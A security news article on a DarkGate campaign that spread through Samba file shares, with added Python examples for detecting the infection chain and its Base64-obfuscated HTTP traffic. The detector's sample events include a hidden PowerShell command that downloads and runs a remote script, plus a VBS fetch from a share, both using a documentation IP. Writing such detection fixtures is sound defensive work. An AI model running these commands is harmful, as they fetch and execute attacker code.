Cybersecurity researchers have disclosed a short-lived DarkGate malware campaign that leveraged Samba file shares to initiate infections.
Palo Alto Networks Unit 42 said the activity spanned March and April 2024, with the infection chains using servers running public-facing Samba file shares that hosted Visual Basic Script (VBS) and JavaScript files. Targets included North America, Europe, and parts of Asia.
“This was a relatively short-lived campaign that illustrates how threat actors can creatively abuse legitimate tools and services to distribute their malware,” security researchers Vishwa Thothathri, Yijie Sui, Anmol Maurya, Uday Pratap Singh, and Brad Duncan said.
DarkGate, which first emerged in 2018, has evolved into a malware-as-a-service (MaaS) offering used by a tightly controlled number of customers. It comes with capabilities to remotely control compromised hosts, execute code, mine cryptocurrency, launch reverse shells, and drop additional payloads.
Attacks involving the malware have notably surged in recent months in the aftermath of the multinational law enforcement takedown of the QakBot infrastructure in August 2023.
The campaign documented by Unit 42 begins with Microsoft Excel (.xlsx) files that, when opened, urge targets to click an embedded Open button, which in turn fetches and runs VBS code hosted on a Samba file share.
The VBS script is configured to retrieve and execute a PowerShell script, which is then used to download an AutoHotKey-based DarkGate package.
Alternate sequences using JavaScript files instead of VBS are no different in that they are also engineered to download and run the follow-up PowerShell script.
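The chain described above (Office document, then a script host loading VBS or JavaScript from an SMB share, then PowerShell, then AutoHotkey) is a good fit for a parent-child process detection. The following is an added example written for this article, not Unit 42's code or a published rule: the Sysmon-like event fields, the sample events (with a TEST-NET documentation IP) and the regular expression for a UNC script path are all constructed for illustration.

```python
"""Flag the Excel -> script host (SMB share) -> PowerShell -> AutoHotkey chain in
process-creation events.  Added illustration; field names and events are constructed."""
import re
from typing import Callable, Dict, List, Tuple

# Constructed Sysmon-like events (not real telemetry). 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 900, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"EXCEL.EXE" "C:\Users\alice\Downloads\Invoice_2024.xlsx"'},
    {"pid": 4212, "ppid": 4100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe //B "\\203.0.113.10\share\update.vbs"'},
    {"pid": 4300, "ppid": 4212, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoP -W Hidden -Command "iex (New-Object Net.WebClient).DownloadString(\'http://203.0.113.10/stage.ps1\')"'},
    {"pid": 4388, "ppid": 4300, "image": r"C:\Users\alice\AppData\Local\Temp\AutoHotkey.exe",
     "cmdline": r"AutoHotkey.exe C:\Users\alice\AppData\Local\Temp\script.ahk"},
    # Benign noise: an admin running a script from a local path, with no Office parent.
    {"pid": 5000, "ppid": 900, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe C:\Scripts\inventory.vbs"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# A UNC path (\\host\share\...) ending in a Windows Script Host extension; covers the JS variant too.
UNC_SCRIPT_RE = re.compile(r'\\\\[^\\\s"]+\\[^\s"]+\.(?:vbs|vbe|js|jse)\b', re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(by_pid: Dict[int, dict], pid: int) -> List[str]:
    """Image basenames from pid upward (child first), stopping at unknown or cyclic parents."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def matches_in_order(names: List[str], predicates: List[Callable[[str], bool]]) -> bool:
    """True if each predicate matches some name, in order, walking up the ancestry."""
    idx = 0
    for pred in predicates:
        while idx < len(names) and not pred(names[idx]):
            idx += 1
        if idx == len(names):
            return False
        idx += 1
    return True


def find_darkgate_chain(events: List[dict]) -> List[Tuple[str, int]]:
    by_pid = {e["pid"]: e for e in events}
    findings: List[Tuple[str, int]] = []
    for ev in events:
        name = basename(ev["image"])
        # Stage 1: a script host pulling VBS/JS straight from an SMB share.
        if name in SCRIPT_HOSTS and UNC_SCRIPT_RE.search(ev["cmdline"]):
            findings.append(("script_from_smb_share", ev["pid"]))
        # Full chain: AutoHotkey with PowerShell, a script host and an Office app above it, in that order.
        if name.startswith("autohotkey"):
            parents = ancestry(by_pid, ev["pid"])[1:]
            if matches_in_order(parents, [lambda n: n == "powershell.exe",
                                          lambda n: n in SCRIPT_HOSTS,
                                          lambda n: n in OFFICE_APPS]):
                findings.append(("office_script_powershell_autohotkey_chain", ev["pid"]))
    return findings


if __name__ == "__main__":
    for kind, pid in find_darkgate_chain(SAMPLE_EVENTS):
        print(f"{kind}: pid {pid}")
```

The stage-1 check fires on its own, which matters because the UNC fetch is the earliest observable step and the Office parent may already have exited by the time AutoHotkey runs; the full-chain check is the higher-confidence signal.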
DarkGate works by scanning for various anti-malware programs and checking CPU information to determine whether it is running on a physical host or in a virtual environment, which allows it to hinder analysis. It also examines the host's running processes for the presence of reverse engineering tools, debuggers, or virtualization software.
“DarkGate C2 traffic uses unencrypted HTTP requests, but the data is obfuscated and appears as Base64-encoded text,” the researchers said.
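Because the C2 channel is cleartext HTTP, the obfuscation is visible to anyone inspecting the traffic: Base64 is an encoding, not encryption, and a body that decodes to high-entropy bytes rather than text is the tell. The heuristic below is an added example, not Unit 42's code and not a fingerprint of DarkGate's actual message format; the sample requests, the documentation-range IP and the entropy threshold are constructed for illustration.

```python
"""Score cleartext HTTP requests for opaque Base64 bodies of the kind the article describes.
Added illustration; sample requests and threshold are constructed, not captured DarkGate traffic."""
import base64
import binascii
import ipaddress
import math
import re
from typing import Dict, Optional
from urllib.parse import urlsplit

BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Constructed stand-in for an obfuscated C2 message: 128 distinct byte values, so 7 bits/byte of entropy.
OPAQUE_BLOB = bytes((i * 37 + 11) & 0xFF for i in range(128))
SUSPECT = ("POST", "http://203.0.113.10/index.php", base64.b64encode(OPAQUE_BLOB).decode())
BENIGN_FORM = ("POST", "http://intranet.example/login", "user=alice&action=login")
BENIGN_B64 = ("POST", "https://api.example/v1/notes",
              base64.b64encode(b"hello world, this is a normal message").decode())


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 for uniformly distributed bytes, far lower for ASCII text."""
    if not data:
        return 0.0
    counts: Dict[int, int] = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def decode_if_base64(text: str) -> Optional[bytes]:
    """Return decoded bytes when the whole body is strict Base64, else None."""
    text = text.strip()
    if len(text) < 16 or len(text) % 4 or not BASE64_RE.match(text):
        return None
    try:
        return base64.b64decode(text, validate=True)
    except binascii.Error:
        return None


def is_raw_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def score_request(method: str, url: str, body: str, entropy_threshold: float = 4.5) -> Dict[str, object]:
    parts = urlsplit(url)
    decoded = decode_if_base64(body)
    indicators: Dict[str, object] = {
        "method": method,
        "plain_http": parts.scheme == "http",
        "raw_ip_host": is_raw_ip(parts.hostname or ""),
        "base64_body": decoded is not None,
        "high_entropy_payload": decoded is not None and shannon_entropy(decoded) > entropy_threshold,
    }
    # Flag an opaque Base64 body carried over cleartext HTTP; a raw-IP host adds confidence but is not required.
    indicators["flagged"] = bool(indicators["plain_http"] and indicators["high_entropy_payload"])
    return indicators


if __name__ == "__main__":
    for label, req in (("suspect", SUSPECT), ("form", BENIGN_FORM), ("base64 text", BENIGN_B64)):
        print(label, score_request(*req))
```

The entropy test on the decoded bytes, rather than on the Base64 string itself, is what separates an obfuscated blob from ordinary Base64-wrapped text such as a JSON note or an e-mail attachment; the 4.5 bits/byte threshold is a starting point to tune against the traffic of the environment being monitored.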
“As DarkGate continues to evolve and refine its methods of infiltration and resistance to analysis, it remains a potent reminder of the need for robust and proactive cybersecurity defenses.”